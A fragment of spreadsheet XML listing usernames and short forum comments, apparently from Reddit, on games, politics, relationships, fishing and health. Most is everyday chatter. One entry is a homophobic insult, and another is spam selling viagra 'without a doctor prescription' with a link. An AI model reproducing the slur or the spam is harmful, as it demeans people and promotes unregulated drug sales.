    <t>Oh ok. I like it because it has the most oc. A lot of reposts but I just report.</t>
  </si>
  <si>
    <t>ethanbro9</t>
  </si>
  <si>
    <t>that isn’t crappy design... if those are casino cards, then they have to alter it in some way to make sure you cannot sneak them into casinos. it might be a hole punched, or the corners cut off, just to make sure that you don’t cheat in the casino.</t>
  </si>
  <si>
    <t>-BuckarooBanzai-</t>
  </si>
  <si>
    <t>On citadel the whole station is a cum dungeon.</t>
  </si>
  <si>
    <t>ASpaceOstrich</t>
  </si>
  <si>
    <t>Yes, everyone is suffering reduced cognitive capacity due to air pollution. We have more resources but we’re all less than we could be.</t>
  </si>
  <si>
    <t>Woodie626</t>
  </si>
  <si>
    <t>Do you think these kids are treated unfairly? And if yes, what is your basis of comparison?</t>
  </si>
  <si>
    <t>pennysoap</t>
  </si>
  <si>
    <t>They have stores in the US. They had two in chicago.</t>
  </si>
  <si>
    <t>PatDaddy2625</t>
  </si>
  <si>
    <t>Yesterday was pretty bad....</t>
  </si>
  <si>
    <t>SilverBallsOnMyChest</t>
  </si>
  <si>
    <t>Chip still isn't firing Felix after a year. Stop jumping to conclusions on stuff you know nothing about.</t>
  </si>
  <si>
    <t>Rex_Deserved_It</t>
  </si>
  <si>
    <t>Jealous much?</t>
  </si>
  <si>
    <t>Not sure, plans changed because ex asked if I'd keep the kids for the next few weekends.</t>
  </si>
  <si>
    <t>androocrawford</t>
  </si>
  <si>
    <t>I need a printout of these critics names so I can make sure to absolutely never ever ever take any of their reviews seriously in the future. Pulp Fiction is like ten trillion times better. Fuck even Kill bill blows Inglorious Basterds out of the water..then into interstellar space</t>
  </si>
  <si>
    <t>Funny_Sentinel</t>
  </si>
  <si>
    <t>Your submission appears to violate either [Rule 2](https://www.reddit.com/r/funny/wiki/rules#wiki_2._no_memes.2C_and_no_hifw.2C_mrw.2C_meirl.2C_or_dae_posts.) or [Rule 10](https://www.reddit.com/r/funny/wiki/rules#wiki_10._no_sms_or_social_media_content_.28including_reddit.29.), and has therefore been removed. If you feel this was done in error, you may contact the moderators for a manual appraisal. ^^This ^^is ^^a ^^robotic ^^account. ^^Its ^^actions ^^are ^^performed ^^automatically.</t>
  </si>
  <si>
    <t>goobervision</t>
  </si>
  <si>
    <t>Kippers, as in the fish. Terribly encased in ice to keep it fresh? Or UKIP donor giving Boris £20,000 and his waving the fish around to hide the news about it and create another anti-EU lie? https://www.mirror.co.uk/news/politics/big-ukip-donor-andmayfair-club-17390528</t>
  </si>
  <si>
    <t>SophiePride</t>
  </si>
  <si>
    <t>I really need more context or explanation on this. But from what I think you're asking the answer is yes</t>
  </si>
  <si>
    <t>TeraSera</t>
  </si>
  <si>
    <t>The desire to have a feminine body, and a disconnect with my current form are what drives me. I need harmony between who I am inside and outside.</t>
  </si>
  <si>
    <t>BobOfTheSnail</t>
  </si>
  <si>
    <t>So like human shaped lightning based volatile dead with out the corpse requirement</t>
  </si>
  <si>
    <t>Ed__ButteredToast</t>
  </si>
  <si>
    <t>Nobody cares.</t>
  </si>
  <si>
    <t>Lil_Kicks</t>
  </si>
  <si>
    <t>he’s probably dating someone else and you aren’t his number one priority anymore you’re expecting girlfriend levels of attention without being his girlfriend</t>
  </si>
  <si>
    <t>I think what will hold me back is that I don't know if I can raid. I dread having to talk to strangers and be treated like crap because I mess up or don't know something or spend 5+ hrs doing one encounter. I remember trying to do that with Kings fall and it was not a fun experience :/</t>
  </si>
  <si>
    <t>Fey_fox</t>
  </si>
  <si>
    <t>Ford is a Gen-Xer... this makes total sense</t>
  </si>
  <si>
    <t>BigRichardFitzwell</t>
  </si>
  <si>
    <t>Nope wasn’t Georgia must just be same trash different trailers lol</t>
  </si>
  <si>
    <t>barely1egal</t>
  </si>
  <si>
    <t>Yeah he does look promising, but his attitude is apparently pretty shit which is why he was loaned out in the first place. Also he plays in a position we are currently pretty stacked in so arguably the money from him could be better used in other areas.</t>
  </si>
  <si>
    <t>Jironobou</t>
  </si>
  <si>
    <t>Another problem is the whole "being sacrificed and coming back without a soul" thing was the in-game explanation for why respawning is possible at all, and being able to do that before the sacrifice kiiinda breaks lore</t>
  </si>
  <si>
    <t>DrewFlu33</t>
  </si>
  <si>
    <t>Originally Posted by Wackyjig Wow, thanks Drew. That's a ton of information. I don't think the main lake grass is up enough to flip yet, there's some in pockets and creeks surfaced or just below that is flippable but it's hammered just like the ledges. I'll definitely be giving this stuff a shot this weekend to see what I can find I think a big misconception is that it needs to be topped out to flip it. I actually prefer and have more luck flipping the stuff that has not topped out yet (or that never does top out which is pretty common around here with our comparatively short "growing season"). Maybe it's as simple as people not flipping it as much if it's not topped out and so those fish are less pressured. In any case, if it's a couple or three feet off the bottom, there will be a "cavern" underneath that the fish get into and you can flip it! Originally Posted by TohoRookie I've been all over grass flats lately. All my fish have left open water. I seem to catch a lot of numbers over the tops of the grass...using drop shots, jerkbaits, lighter jigs , but not much size. I'm going to try pitching with punch skirt and heavier weight like you mention, and see if I can get down a little deeper. Hopefully I can find some bigger ones that way. That sounds like a good plan! Around here you can get them over the tops, but it's rare to get the good ones that way except maybe early in the morning or on cloudy and/or rainy days. It's not to say that you won't catch little ones buried in it or that you won't catch a good one fishing over top of it, but the big ones definitely seem to bury up in it much more than they're willing to come out and chase something.</t>
  </si>
  <si>
    <t>counterweight7</t>
  </si>
  <si>
    <t>Most of this sub is about bad things potentially happening, but this photo is super gross and not even clear what went wrong.</t>
  </si>
  <si>
    <t>Ndantona</t>
  </si>
  <si>
    <t>Best character other than Littlefinger</t>
  </si>
  <si>
    <t>okay_yes_please</t>
  </si>
  <si>
    <t>If she wants on the deed, she needs the liability of the mortgage too. She is asking you legally hand her 50% of the property with NO obligation of paying. NEVER NEVER NEVER NEVER NEVER NEVER NEVER.</t>
  </si>
  <si>
    <t>Greych12</t>
  </si>
  <si>
    <t>Fuck. Free rent. Let me buy a blonde wig</t>
  </si>
  <si>
    <t>melonfarmermike</t>
  </si>
  <si>
    <t>Pyney's war house, where low morals are just the beginning. [https://www.youtube.com/watch?v=BhfqQzMVJxI](https://www.youtube.com/watch?v=BhfqQzMVJxI)</t>
  </si>
  <si>
    <t>undergroundsculpture</t>
  </si>
  <si>
    <t>Link to more of your stuff buddy... I like it.</t>
  </si>
  <si>
    <t>shinyspatula3</t>
  </si>
  <si>
    <t>congrats!!! how many did you get wrong on science?</t>
  </si>
  <si>
    <t>murkus18</t>
  </si>
  <si>
    <t>I didn’t say everyone who adopts is pro-life, i explicitly stated that most of the foster parents that I know are pro-life. And that being said I don’t see a lot of people on the pro-choice side doing much to help out with the foster system. And the point of this post wasn’t to say pro-choicers do nothing to help adoption, it was to point out the fact that many people on the pro-life side care about life after birth, unlike popular opinion. And I also really thank your family for fostering kids as their is a desperate need</t>
  </si>
  <si>
    <t>Pyroweedical</t>
  </si>
  <si>
    <t>Wait inverted flight controls as in move stick up for plane to ascend? Or move stick up for plane to descend?</t>
  </si>
  <si>
    <t>Haiete</t>
  </si>
  <si>
    <t>That requires her to date a Human though, something she doesn’t really seem to enjoy these days. I am shipping Baine and Jaina. Can’t wait for the artwork.</t>
  </si>
  <si>
    <t>PurpleTridentCX</t>
  </si>
  <si>
    <t>Teachers of Reddit what student do you remember or think of the most and why?</t>
  </si>
  <si>
    <t>Mormonster</t>
  </si>
  <si>
    <t>Look into his other replies. He mentioned certain programs that were defunded under Obama to give Space-X a chance at good publicity. We would have already landed on asteroids...</t>
  </si>
  <si>
    <t>AnEnemyStando</t>
  </si>
  <si>
    <t>&gt; The fact that the joke has nearly 22k upvotes makes it pretty clear that you're wrong on this one. Appeal to majority. It just means 22k people have the same shitty attitude and don’t care about others.</t>
  </si>
  <si>
    <t>MikeWangBurner</t>
  </si>
  <si>
    <t>Wait, you ain’t even agree with him</t>
  </si>
  <si>
    <t>AloneinMorroBay</t>
  </si>
  <si>
    <t>Yeah dude this guys being a total insecure homo. Probably sucks cock in secret</t>
  </si>
  <si>
    <t>MrMcBonk</t>
  </si>
  <si>
    <t>Don't waste your money on this snake oil garbage. It will not objectively improve anything. The first Mcable was garbage (It wasn't an upscaler. All it did was massively process the image and oversharpened it at the last step. It couldn't even handle long horizontal edges with aliasing) and this will be too. You can't do real AA to an input that is just a flat image. Most games already have Post Processing AA to begin with so there will be no benefits. You will just get more artifacts from that, and you will get artifacts from their snake oil BS marketing about analyzing the image. You cannot infer sub pixel information without access to what is actually there. It's like AI upsampling without the AI being trained. To show an example of this being used in a proper way, just look at Nvidia's DLSS. It has AI trained on what it thinks "the ground truth" is. But it has to be plugged into the game's rendering chain to work with lower resolution buffers, infer the information while upsampling to a much higher resolution. And the results are not good if you know what real Anti Aliasing looks like and should look like. The output is over sharpened, fine sub pixel information is not interpreted all that well and ends up smearing that information when static. And then when there is movement, the temporal component has to kick in and that likewise introduces problems with fine sub pixel detail. Things like grass get smeared in motion as it can't keep up. This is *best* case scenario where DLSS is integrated with the game. Now you are asking this cable to do the same thing, with access to NONE of that information. All it can see is a flat 2D input. There's no way on earth you can properly Anti Alias an image with such a set up. It's impossible. As it is, they are basically putting Waifu2x into a cable and turning the marketing up to 11. Which is basically what their first cable was without actual upscaling. Pre-filtering the image before your TV upscaled it instead. The closet existing example with consoles is like the "Smoothing" filter on PS3 used for PS1 and PS2 games.</t>
  </si>
  <si>
    <t>corwin_of_amber_</t>
  </si>
  <si>
    <t>He announced why she was receiving the ticket and when she had to address it by. At this point she refuses to sign it. She doesn't ask what signing the ticket means, she doesn't read the ticket, she doesn't ask if she can fight it in court, she simply states that she doesn't believe she should be held accountable for the law she broke. She has stated at that point that she will not take any legal path toward resolving this and even if she had signed and followed through with those stated intentions then she still would be arrested. At no point does she show that she would like to resolve this in a legal way where she's released under her own power. He could have told her that signing is not an admission of guilt but a sworn statement that you will address the issue in a legal way within the stated timeframe but she simply does not believe the law applies to her. What way would you have convinced her that the law does indeed apply to her?</t>
  </si>
  <si>
    <t>beautyofamoment</t>
  </si>
  <si>
    <t>NTA I'm sure it is not how she is intending it, but it is coming off as insensitive. If its a surprise, I'm sure you won't be the only guest with those feelings.</t>
  </si>
  <si>
    <t>samtheoneca</t>
  </si>
  <si>
    <t>I thought the answer was going to be "everyone"</t>
  </si>
  <si>
    <t>Kicooi</t>
  </si>
  <si>
    <t>The problem with the Nazis on /pol/ is at least half of them are serious, and the ones that aren’t serious are usually too stupid to tell the difference anyways, and aren’t even nuanced in their jokes</t>
  </si>
  <si>
    <t>Eliijah_Moss</t>
  </si>
  <si>
    <t>I’m not entirely sure. Worth a try considering the nice animation is has</t>
  </si>
  <si>
    <t>sarabits112</t>
  </si>
  <si>
    <t>What's something you do in bed and other places?</t>
  </si>
  <si>
    <t>Mast3r0fPip3ts</t>
  </si>
  <si>
    <t>Ah, so you’re old and ignorant to boot, makes sense. You’re continuing to appeal to authority and citing nothing. You’re making no fucking point. You’re literally offering nothing to this conversation. Either start laying down evidence or you’re just running your mouth.</t>
  </si>
  <si>
    <t>FLink557</t>
  </si>
  <si>
    <t>We had a good thing going! And you had to blow it up!!...</t>
  </si>
  <si>
    <t>Dontbeatrollplease1</t>
  </si>
  <si>
    <t>Funny because they don't care about your body, just the baby inside of it.....</t>
  </si>
  <si>
    <t>SteamHeaven</t>
  </si>
  <si>
    <t>does thanos has something to do with this ?</t>
  </si>
  <si>
    <t>9Lives_</t>
  </si>
  <si>
    <t>Location is definitely a contributing factor, but also the standard of lifestyle you maintain.</t>
  </si>
  <si>
    <t>Azule4n</t>
  </si>
  <si>
    <t>the meme struggle is reall</t>
  </si>
  <si>
    <t>BernardUnsut</t>
  </si>
  <si>
    <t>Superb information. Regards. viagra toung generic viagra 100mg levitra cialis viagra viagra without a doctors prescription how long viagra last viagra without a doctor prescription viagra effects on erections viagra without a doctors prescription viagra generic cheap fast viagra contraindications viagra without a doctor prescription viagra producer - https://www.genericonlineviagrarx.com viagra and prostatitis viagra and dibeties viagra experiences</t>
  </si>
  <si>
    <t>alborz27</t>
  </si>
  <si>
    <t>Head over to skillshare.com/deeznuts to get 30% off your first three months.</t>
  </si>
  <si>
    <t>CurrysTank</t>
  </si>
  <si>
    <t>r/mapswithoutpeoplefromnz</t>
  </si>
  <si>
    <t>unrehearsedgaming</t>
  </si>
  <si>
    <t>All the bad Game Freak* is doing. FTFY.</t>
  </si>
  <si>
    <t>SoggyMcmufffinns</t>
  </si>
  <si>
    <t>Is ABC not on basic cable these days. If I don't recall, back when I actually watched cable YEARS ago lol, I recall watching some football games on ABC, but it might have been NBC. Maybe both. Could be wrong, but make you at least, because you can buy a great $20 attenna from best buy and get a decent amount of channels for free. If ABC is one of the free ones you're in business. Another option is checking online to see if they offer free tv off their website or an app if you have a smart tv and get a subscription just for them if. Probably a lot cheaper than paying for all the other channels you don't watch if all you care about is the bachelor. Just some thoughts. Streaming is just so much cheaper these days.</t>
  </si>
  <si>
    <t>archelogy</t>
  </si>
  <si>
    <t>Trust me that's not happening.</t>
  </si>
  <si>
    <t>bckesso</t>
  </si>
  <si>
    <t>Nothing really matters long term unless you get suspended/expelled</t>
  </si>
  <si>
    <t>Vasxus</t>
  </si>
  <si>
    <t>not used my I have brain today</t>
  </si>
  <si>
    <t>markyp1234</t>
  </si>
  <si>
    <t>Most friends do each other a favour. Maybe the girl could do a favour to this guy?</t>
  </si>
  <si>
    <t>teiteb</t>
  </si>
  <si>
    <t>he never did get to take her to the cher concert</t>
  </si>
  <si>
    <t>sundialsvc4</t>
  </si>
  <si>
    <t>I like this very much, and I think that the “sparkles” in the second image add positively to the effect. Now, one thing that I’d suggest that you do is to make the light a bit more interesting. Give us a sense that there is a definite point-light source somewhere off-stage, and maybe give it some contrasting, e.g. bluish color. But then, also use that light to help direct our gaze to the first thing that you want our eyes to see, such as the compass/clock. Bending my eyes a bit closer, I see that there’s some interesting-looking detail going on between the various lighted runes – it seems to be a layer of disc-shaped things – “how very interesting.” Dramatic lighting could draw that aspect out, and add an entire new layer of depth to your composition.</t>
  </si>
  <si>
    <t>MK</t>
  </si>
  <si>
    <t>GREAT NEWS FOR THE PET OWNERS hii i just want to tell every pet owner that we provide a short and long term pet care service. now you don,t have to worry about your loved one dog or cat and any other pet while you enjoy your hollidays overseas. now we take care you beloved pet for you. you don't have to worry about his food and safety. we also provide vet treatment if any pet requires. now you can go to any where with whole family without any tension. just leave your pet with us. we have a well trained team to take care ur pet. we can take your pet from home and return to u when u come back from your vacation. we have safe and secure place and environment for pets. we can provide service for a single day or a weak and month according to your plan. FOR ANY TYPE OF QUESTION AND ENQURIES CONTACT US -: m10*</t>
  </si>
  <si>
    <t>Cara777</t>
  </si>
  <si>
    <t>Dissapointing product. Poor quality of material used, and when sitting on the sunbed, the head part flicks up on it's own as it doesn't click into place allowing the laying flat position.</t>
  </si>
  <si>
    <t>researchmj420</t>
  </si>
  <si>
    <t>This is exactly what I came to say. Every fruit or vegetable we eat is GMO through selective breeding for desirable traits.</t>
  </si>
  <si>
    <t>Ikarus7c</t>
  </si>
  <si>
    <t>Now we have to get it above 222k. We can do this reddit!</t>
  </si>
  <si>
    <t>FranceskaMann</t>
  </si>
  <si>
    <t>We can't only talk about having prosperous economies and we can't just vote from our pocketbooks. Capitalistic totalitarianism is on the rise around the world, where a nation may be wealthy but it isn't free. Financial wealth isn't the only critical metric that measures a healthy nation. I would rather live in America during the Great depression than in China today, because of its commitment to transcending values.</t>
  </si>
  <si>
    <t>Mcblyat2</t>
  </si>
  <si>
    <t>Thanks but I've been on here for a while</t>
  </si>
  <si>
    <t>texx2818</t>
  </si>
  <si>
    <t>Anyone with a decent length of time in this town doesn’t care that RGRS was an asshole on social media when it was a staple of the DIY community. Denton is too worried about being nice and gentrified. RGRS was never supposed to be a spot to make a ton of money for casuals to hang out at. It was always an off the wall DIY spot for burners.</t>
  </si>
  <si>
    <t>Alexthegreatbelgian</t>
  </si>
  <si>
    <t>That's luxury. Usually it's mobile urinals [like these](http://www.pee-6.nl/thumb_895_325_Li4vZ2Z4L3VzZXJpbWcvaXByb2Ntc19nYWxsZXJ5LmZpbGVuYW1lLjEyLmE1OWQuanBlZw==.jpg).</t>
  </si>
  <si>
    <t>Brattain</t>
  </si>
  <si>
    <t>Medical device and pharmaceutical advertising is out of control. They should be limited to tasteful ads like in this [unedited footage of a bear.](https://www.youtube.com/watch?v=2gMjJNGg9Z8)</t>
  </si>
  <si>
    <t>icy_ticey</t>
  </si>
  <si>
    <t>I just don’t wanna be the laughingstock of the league and prove we don’t need Odell</t>
  </si>
  <si>
    <t>Okibex</t>
  </si>
  <si>
    <t>I think it's because we're conditioned to do that. English is everywhere, and especially people who spend a lot of time on reddit, youtube and other English speaking places get much more exposure and it just sticks</t>
  </si>
  <si>
    <t>Craig_the_Intern</t>
  </si>
  <si>
    <t>what about a questions like, “through the findings of your report, was Trump’s 2016 victory legitimate?”</t>
  </si>
  <si>
    <t>Orangutan</t>
  </si>
  <si>
    <t>Yep, and 9/11 Truth sub, BostonBombing sub, SandersForPresident sub for a bit, greatawakening, pizzagate, etc.</t>
  </si>
  <si>
    <t>Banicks</t>
  </si>
  <si>
    <t>I find no "beauty" in imbalanced matches. If by unique you mean sticking together to stack a team and throttle new comers, then sure, I would agree. Is that going to help expand the genre? Absolutely not. So it is truely down to the devs to either prevent circumvention of fairness, or, the vets can take it upon themselves to be fair. It's up to both parties to decide, and it's down to them to decide whether to make Mordhau successful past the new fad and pc gamer crap, into the future. If current trends are anything to go by however, I don't see this game lasting longer than a year before it gains numbers equal to or lower than chiv.</t>
  </si>
  <si>
    <t>imadethisacc4advice</t>
  </si>
  <si>
    <t>he seemed interested based on his texts but yeah, you're right. I should be somewhat upfront about my interest and ask him on a date! I just don't want to make things awkward in the friend group if things don't work out. But thank you!!</t>
  </si>
  <si>
    <t>Anonymous #1</t>
  </si>
  <si>
    <t>sorry to hear this you personally helped me through a lot</t>
  </si>
  <si>
    <t>ProHopper</t>
  </si>
  <si>
    <t>That’s not at all true.</t>
  </si>
  <si>
    <t>smog0naut</t>
  </si>
  <si>
    <t>No confirmation, but it seems that way from the voice and the fact that she played similarly campy characters named "Battleaxe" twice in her career.</t>
  </si>
  <si>
    <t>surnguy</t>
  </si>
  <si>
    <t>Wanted to be an airline pilot when I was a kid in the 90s, but now studying to be a chem engineer while working as an operator for food manufacturing</t>
  </si>
  <si>
    <t>MxTINKxM</t>
  </si>
  <si>
    <t>No I got this back in 93 or 94</t>
  </si>
  <si>
    <t>CerealTheCrusader</t>
  </si>
  <si>
    <t>Agreed, and r/askreddit also makes me question</t>
  </si>
  <si>
    <t>at_least_u_tried</t>
  </si>
  <si>
    <t>sort by controversial... apparently it is</t>
  </si>
  <si>
    <t>reflux212</t>
  </si>
  <si>
    <t>How did you miss one of the only two main comments in this thread</t>
  </si>
  <si>
    <t>npc000</t>
  </si>
  <si>
    <t>How many times must this be reposted? In Too Shorts' words, "You roll yo fuckin joint, I'ma roll mines"</t>
  </si>
  <si>
    <t>Chíeun</t>
  </si>
  <si>
    <t>Chameleon skinks are extremely good. Their speed, combined with poison, allows them to kite some cavalry units! The only factions I don’t play are Empire and Bretonnia, and Greenskins (unless you count Skarsnik, goblins are cool). They bore me.</t>
  </si>
  <si>
    <t>Skippy_the_clown</t>
  </si>
  <si>
    <t>Mark Dice Rips the #FAKENEWS Fiasco of the "MULLER Book REPORT"</t>
  </si>
  <si>
    <t>jellybellynails</t>
  </si>
  <si>
    <t>Time to get a Brita and reusable water bottle friend</t>
  </si>
  <si>
    <t>jayja92</t>
  </si>
  <si>
    <t>Man this is the reason I only play Team Rumble. My heart starts beating abnormally fast.</t>
  </si>
  <si>
    <t>&gt;&gt;53669563 what dealbreakers and redflags can i check off for you tonight, femanon?</t>
  </si>
  <si>
    <t>LivingAtAltitude</t>
  </si>
  <si>
    <t>Wow, he must see this all of the time. They're all going to regret this choice.</t>
  </si>
  <si>
    <t>atomicmarc</t>
  </si>
  <si>
    <t>Looks to me like it was done with one of those mechanical lettering tools - I used one back when I had to draw blueprints.</t>
  </si>
  <si>
    <t>Critical_Cracker</t>
  </si>
  <si>
    <t>I agree . but someone like me who likes to 100% games this becomes a major pain in the ass</t>
  </si>
  <si>
    <t>brickcitycomics</t>
  </si>
  <si>
    <t>Fatty fish, cheese, and egg yolks are all high in Vitamin D. In fact most dairy products are. Not sure what the proteins were in this study so this is not surprising. Apparently just 10 minutes of sun exposure during the day for the average healthy person is enough time to produce enough Vitamin D3 for all of your Vitamin D needs. I basically sit outside each day for 10-15 minutes to have a cup of coffee. I tend to go with these guidelines from the National Cancer Institute since they usually adapt their recommendations more quickly bases on the newest research studies. The Institute of Medicine (IOM) of the National Academies has developed the following recommended daily intakes of vitamin D, assuming minimal sun exposure ([1](https://www.cancer.gov/about-cancer/causes-prevention/risk/diet/vitamin-d-fact-sheet#r1),[2](https://www.cancer.gov/about-cancer/causes-prevention/risk/diet/vitamin-d-fact-sheet#r2)): * For those between 1 and 70 years of age, including women who are pregnant or lactating, the recommended dietary allowance (RDA) is 15 micrograms (μg) per day. Because 1 μg is equal to 40 International Units (IU), this RDA can also be expressed as 600 IU per day. * For those 71 years or older, the RDA is 20 μg per day (800 IU per day). * For infants, the IOM could not determine an RDA due to a lack of data. However, the IOM set an Adequate Intake level of 10 μg per day (400 IU per day), which should provide sufficient vitamin D. Even though most people are unlikely to have high vitamin D intakes, it is important to remember that excessive intake of any [nutrient](https://www.cancer.gov/Common/PopUps/popDefinition.aspx?id=CDR0000044697&amp;version=Patient〈uage=English), including vitamin D, can cause [toxic](https://www.cancer.gov/Common/PopUps/popDefinition.aspx?id=CDR0000043986&amp;version=Patient〈uage=English) effects. Too much vitamin D can be harmful because it increases calcium levels, which can lead to [calcinosis](https://www.cancer.gov/Common/PopUps/popDefinition.aspx?id=CDR0000655127&amp;version=Patient〈uage=English) (the deposit of calcium salts in [soft tissues](https://www.cancer.gov/Common/PopUps/popDefinition.aspx?id=CDR0000045882&amp;version=Patient〈uage=English), such as the kidneys, heart, or [lungs](https://www.cancer.gov/Common/PopUps/popDefinition.aspx?id=CDR0000270740&amp;version=Patient〈uage=English)) and [hypercalcemia](https://www.cancer.gov/Common/PopUps/popDefinition.aspx?id=CDR0000045363&amp;version=Patient〈uage=English) (high blood levels of calcium). The safe upper intake level of vitamin D for adults and children older than 8 years of age is 100 μg per day (4000 IU per day). Toxicity from too much vitamin D is more likely to occur from high intakes of dietary supplements than from high intakes of foods that contain vitamin D. Excessive sun exposure does not cause vitamin D toxicity. However, the IOM states that people should not try to increase vitamin D production by increasing their exposure to sunlight because this will also increase their risk of [skin cancer](https://www.cancer.gov/Common/PopUps/popDefinition.aspx?id=CDR0000445084&amp;version=Patient〈uage=English) ([2](https://www.cancer.gov/about-cancer/causes-prevention/risk/diet/vitamin-d-fact-sheet#r2)).</t>
  </si>
  <si>
    <t>Chawwwch</t>
  </si>
  <si>
    <t>That’s the best part, I’m not the best player in the world so I ask people questions. Especially with matchups I have problems with, I literally had the dude who won the tournament with Sonya show me what moves I can punish. You get to see people who play a wide variety of characters &amp; playstyles all right next to you. You can see what they’re doing &amp; ask them why. People who play the same character as you is the best example, they might do a string you don’t ever use &amp; they could teach you something new about it. You will definitely get better by playing locals.</t>
  </si>
  <si>
    <t>Cypher_Blue</t>
  </si>
  <si>
    <t>I mean... If you assume she's paying you minimum wage - or even the going babysitter rate - then the amount you would have made would still not have paid her for the total you would owe her for rent, food, internet, cell phone, insurance, cable, heat, air conditioning, and transportation services she provides you. So, you're still ahead.</t>
  </si>
  <si>
    <t>fadedadrian</t>
  </si>
  <si>
    <t>I'm down to meet up somewhere if y'all know a spot thats playing it that doesn't charge a rediculous cover!</t>
  </si>
  <si>
    <t>TurbidDreams</t>
  </si>
  <si>
    <t>Maybe the writers of the stories you dislike don't agree with you on what does and doesn't "directly relate."</t>
  </si>
  <si>
    <t>Aaod</t>
  </si>
  <si>
    <t>Anyone with money where I live takes one look at the local schools and immediately moves to the next town over where housing costs 50% more but the schools are good. Doctors will not send their kids to the same schools their patients kids go to.</t>
  </si>
  <si>
    <t>Fulfillment Senior Advisor</t>
  </si>
  <si>
    <t>I worked 3 years Pros Team atmosphere. You really feel like everyone has your back. Cons None that I can think of Advice to Management keep up the good work</t>
  </si>
  <si>
    <t>DrStrongMD</t>
  </si>
  <si>
    <t>I ring of spell storing that is made of 2 peices, the other peice of which can twist to indicate if its holding a spell or not</t>
  </si>
  <si>
    <t>ipoststoned</t>
  </si>
  <si>
    <t>I feel the same after taco bell</t>
  </si>
  <si>
    <t>OriginalMann</t>
  </si>
  <si>
    <t>the screen looks so sick, I thought I had my endgame until I saw this giant masterpiece</t>
  </si>
  <si>
    <t>BenevolentNihilist1</t>
  </si>
  <si>
    <t>How could you possibly know that? And there's nothing wrong with tax payed college.</t>
  </si>
  <si>
    <t>warhenk@yahoo.com</t>
  </si>
  <si>
    <t>Thanks guys, I see it- left-bottom of the Sound Tab, select Volume, and edit with the pencil. Thank you!</t>
  </si>
  <si>
    <t>seayacharlie</t>
  </si>
  <si>
    <t>Quote: : Dang, you folks make me proud proud that I have a 2001 F150 Lariat that I purchased in 2012 (75,500 miles than). Currently has 178K miles and still runs great. Needs a paint job but pull both my boats with ease. Been an excellent truck and has some scratches but no dents. Never saw 3,000 mies with out getting an oil change. You folks have let me know that I will just keep her. At my age and health, I will never get the value out of a new truck....Oh, I paid 6500.00 for that Lariat in 2012...NADA and others had it listed at 12-13,000. Enjoy your new vehicles! My old 2003 F250 5.4L with 110,000 miles better last awhile longer. Seeing the out to door price might help me later when I go buy one of the trade in models. My local dealer after several purchases has become more non negotiable on both price, and interest rate. It pays to shop around when needing financing like I do. Glad you got a good deal on your new truck.</t>
  </si>
  <si>
    <t>el_pinata</t>
  </si>
  <si>
    <t>The light that burns twice as bright, burns half as long. And you burned so very brightly. RIP Rutger.</t>
  </si>
  <si>
    <t>gsam55474</t>
  </si>
  <si>
    <t>I was just trying to provide some background about why the system is so harsh on people who report therapy. If you don't report it, it will never come up in service unless you choose to speak to the doctors about it. Additionally you can pursue talk therapy in country (supposedly) and speak with somebody over the phone if you would like to speak with an American and not PCMO. Good luck with whatever you decide.</t>
  </si>
  <si>
    <t>Alois000</t>
  </si>
  <si>
    <t>Wait and the A supports that take 2 convos? (Like Ingrid-Sylvain) Does it count the first or the second time?</t>
  </si>
  <si>
    <t>jamvanderloeff</t>
  </si>
  <si>
    <t>Note even for composite the PAL cable is not the same as the NTSC one.</t>
  </si>
  <si>
    <t>Then aborting fetus is killing someone. And killing someone for no reason is wrong.</t>
  </si>
  <si>
    <t>deliciousbooty</t>
  </si>
  <si>
    <t>This one probably took me around 4 or 5 hours to do not counting time spent waiting for paint to dry. I spent a couple days on it!</t>
  </si>
  <si>
    <t>The_sassy_blacksmith</t>
  </si>
  <si>
    <t>I'd prank people all ..the...time . Squeeze straws so u can't drink out of it . Make a coat float by and watch everyone freak out . Stuff like that</t>
  </si>
  <si>
    <t>Nihilistic_Avocado</t>
  </si>
  <si>
    <t>It only gets better from there. Stormlight is one of the best series I’ve ever read</t>
  </si>
  <si>
    <t>Hogwartsreject1912</t>
  </si>
  <si>
    <t>With KJ’s voice, none.</t>
  </si>
  <si>
    <t>RiotRoBot</t>
  </si>
  <si>
    <t>How do they cook that? Is it pan-fried or boiled?</t>
  </si>
  <si>
    <t>Pmang6</t>
  </si>
  <si>
    <t>I'll have to look him up, thanks</t>
  </si>
  <si>
    <t>suze2you</t>
  </si>
  <si>
    <t>Light Rail - public transportation system Taxi - Flat Rate for Hire is the official company at the airport, over in the parking garage Taxi - Yellow Cab you need to call for pick up Towncar - also in the taxi area of the parking garage or you can call for pick up at baggage claim Shuttle Express - shared shuttles priced per person Uber/Lyft - shared ride system, separate area but same floor as taxis in the parking garage</t>
  </si>
  <si>
    <t>[WOLF9] Abbye</t>
  </si>
  <si>
    <t>2 hours ago, Herr_Reitz said: Well that's fine and all.. but to credit it without my being able to access it to find out what it was is, or was, frustrating. To heck with it! Herr_Reitz, You are about a month late on this. The button some posts are talking about was removed this morning (as intended). If you are still getting credit for the missions, good for you, though that is sure to end Wednesday morning with the next patch. I do encourage you to take a gander at the WoWs News from time to time, either in game or on the web sites front page. These things are listed all over the place. As far as forums, do a search, there are plenty of complaint posts on the event to give you a hint somethings up (especially on the Base XP missions). FYI: New set of missions (french DD's) coming with Wednesday's patch. Likely won't be available until Thursday (typical for directives to go live the day after patch day). For details see the in game news feed or https://worldofwarships.com/en/news/game-updates/french-destroyers-the-full-guide/ Abbye</t>
  </si>
  <si>
    <t>BKrustev</t>
  </si>
  <si>
    <t>A sidesword is functionally 95% an arming sword.</t>
  </si>
  <si>
    <t>vvanderbred</t>
  </si>
  <si>
    <t>Yep. Which makes sense in light of recent failures in anti-amyloid clinical trials- patients don't see great improvement, and their risk of infection rises.</t>
  </si>
  <si>
    <t>nursehoneybadger</t>
  </si>
  <si>
    <t>Luck, or a little respect from the home plate umpire wouldn’t hurt</t>
  </si>
  <si>
    <t>WhatZooka</t>
  </si>
  <si>
    <t>best putting my finger knuckle deep down my dil hole, worst leaving it in there for to long</t>
  </si>
  <si>
    <t>ParadoxElevator</t>
  </si>
  <si>
    <t>Plus, it seems he's grown a lot. His mental fortitude is just insane. Today's P3 is truly a reward for all his hard work.</t>
  </si>
  <si>
    <t>catragore</t>
  </si>
  <si>
    <t>Well, of course GRRM made her up. I can understand this viewpoint, and it might be correct. But is this a criticism towards his ability to write female characters? If he wanted to inform us about her character in some way, he chose to do it through a plausible scenario that could happen to a woman in actual life. As for Brianne, Brianne being sexual, and having sexual threats thrown at her is not the same. She lives in a society that mainly views women as fucking/child baring machines and not much more. Brianne herself has no intention of conforming to these expectations. I don't see how this conflicts with her not being sexual.</t>
  </si>
  <si>
    <t>chickenstuff18</t>
